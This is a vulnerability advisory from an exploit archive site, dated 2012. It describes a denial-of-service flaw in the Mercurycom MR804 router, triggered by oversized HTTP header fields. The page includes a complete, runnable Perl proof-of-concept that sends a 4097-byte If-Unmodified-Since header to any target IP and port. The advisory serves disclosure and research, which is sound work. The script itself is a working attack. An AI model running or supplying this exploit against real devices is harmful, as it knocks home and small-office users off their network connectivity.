what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mercurycom MR804 Router Denial Of Service

Mercurycom MR804 Router Denial Of Service
Posted Feb 22, 2012
Authored by demonalex

Mercurycom MR804 Router version 3.8.1 Build 101220 Rel.53006nB suffers from a denial of service vulnerability when fed multiple HTTP headers.

tags | exploit, web, denial of service
SHA-256 | bcb466aefafb323238fa7776d12c39fca5da5fac0996900812c40f57e49cb5ef

Mercurycom MR804 Router Denial Of Service

Change Mirror Download
Title: Mercurycom MR804 Router -  Multiple HTTP Header Fields Denial Of Service Vulnerability

Product : Mercurycom MR804 Router

Hardware Version : MR804 v8.0 081C3113

Software Version : 3.8.1 Build 101220 Rel.53006nB

Vendor: http://www.mercurycom.com.cn/

Class: Boundary Condition Error

CVE:

Remote: Yes

Local: No

Published: 2012-02-21

Updated:

Impact : Medium (CVSS2 Base : 6.1, AV:A/AC:L/Au:N/C:N/I:N/A:C)

Bug Description :
Mercurycom router are commonly used for internet connectivity for home or small office needs. (http://www.mercurycom.com.cn/Product/list)
Mercurycom MR804 Router contains any denial of service vulnerability about HTTP Header Fields(Such as If-Modified-Since, If-None-Match,
If-Unmodified-Since, etc...) in its HTTP service.

POC:
#-------------------------------------------------------------
#!/usr/bin/perl -w
use Socket;
$|=1;
print '*********************************'."\n";
print '* mercurycom MR804 v8.0 DoS PoC *'."\n";
print '* writed by demonalex@163.com *'."\n";
print '*********************************'."\n";
$evil='A'x4097;
$test_ip=shift; #target ip
$test_port=shift; #target port
if(!defined($test_ip) || !defined($test_port)){
die "usage : $0 target_ip target_port\n";
}
$test_payload=
"GET / HTTP/1.0\r\n".
"Accept: */*\r\n".
"Accept-Language: zh-cn\r\n".
"UA-CPU: x86\r\n".
"If-Unmodified-Since: ".$evil."\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;".
" .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n".
"Host: ".$test_ip."\r\n".
"Connection: Keep-Alive"."\r\n\r\n";
$test_target=inet_aton($test_ip);
$test_target=sockaddr_in($test_port, $test_target);
socket(SOCK, AF_INET, SOCK_STREAM, 6) || die "cannot create socket!\n";
connect(SOCK, $test_target) || die "cannot connect the target!\n";
send(SOCK, $test_payload, 0) || die "cannot send the payload!\n";
#recv(SOCK, $test_payload, 100, 0);
close(SOCK);
print "done!\n";
exit(1);
#-------------------------------------------------------------

Credits : This vulnerability was discovered by demonalex@163.com
mail: demonalex@163.com / ChaoYi.Huang@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close